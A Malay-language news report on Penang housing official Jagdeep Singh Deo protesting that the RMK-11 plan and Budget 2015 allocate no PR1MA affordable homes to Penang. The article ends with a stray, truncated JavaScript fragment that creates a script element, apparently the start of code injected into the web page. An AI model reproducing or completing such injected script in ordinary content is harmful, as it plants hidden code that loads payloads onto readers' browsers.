RMK-11: Berapa unit 7 rumah mampu milik untuk P. Pinang?

DATUK KERAMAT – Rancangan Malaysia Ke-11 (RMK-11) yang diumumkan Perdana Menteri, Datuk Seri Najib Tun Razak pada 21 Mei lepas hanya menyebut sejumlah 653,000 rumah mampu milik akan dibina di tanah air ini dalam tempoh lima tahun, tetapi masih tidak menyebut rancangan pembinaan Perumahan Rakyat 1Malaysia (PR1MA) di Pulau Pinang.

Justeru, Exco Perancangan Bandar & Desa dan Perumahan, Jagdeep Singh Deo menggesa sekali lagi Kerajaan Pusat supaya tidak terus menganaktirikan rakyat Malaysia di Pulau Pinang, sebagaimana perbentangan Bajet 2015 pada bulan Disember tahun lepas.

Katanya, Bajet 2015 memperuntukkan sejumlah RM1.8 bilion untuk membina 80,000 unit perumahan mampu milik di tanah air, namun, sehingga kini tiada pembangunan PR1MA di negeri ini.

Manakala, RMK-11 menyebut pembangunan PR1MA di empat bandar utama yang diklasifikasikan sebagai bandar-bandar berdaya saing, iaitu Kuala Lumpur, Johor Bahru, Kuching dan Kota Kinabalu.

“Berapakah daripada jumlah 80,000 dan 653,000 unit rumah mampu milik ini yang akan dibina di negeri Pulau Pinang,” ujarnya kepada wartawan di sini baru-baru ini.

Jagdeep sekali lagi mendedahkan bahawa agensi Persekutuan sejak tahun 2012 langsung tidak pernah mengemukakan permohonan rasmi kepada pihak berkuasa tempatan (PBT) sama ada Majlis Bandaraya Pulau Pinang (MBPP) atau Majlis Perbandaran Seberang Perai (MPSP), untuk pembinaan PR1MA di negeri ini.

Tambah beliau, Pembangkang Pulau Pinang sepatutnya turut mempengaruhi Putrajaya agar menghentikan layanan dingin ke atas rakyat Malaysia di negeri ini.

Ini kerana, tegasnya, Ahli Dewan Undangan Negeri (ADUN) Teluk Bahang, Datuk Shah Headan Ayoob Hussain Shah pada sesi perbahasan Mesyuarat Pertama Penggal Ketiga Dewan Undangan Negeri (DUN) Pulau Pinang Yang Ke-13 baru-baru ini, antara lain mengakui bahawa beliau akan ‘memujuk’ Putrajaya untuk menunaikan janji membina PR1MA di negeri ini.

“Diharapkan bahawa warga Pulau Pinang tidak akan dianaktirikan dari segi pembekalan perumahan mampu milik di bawah PR1MA,” tegas Jagdeep lagi.

Sebelum itu, Jagdeep yang juga ADUN Datuk Keramat menyerahkan lima keping cek yang setiap satu berjumlah RM500 kepada lima mangsa ribut di Flat Taman Nusantara dekat Jalan Perak di sini.

var d=document;var s=d.createElement(‘script’);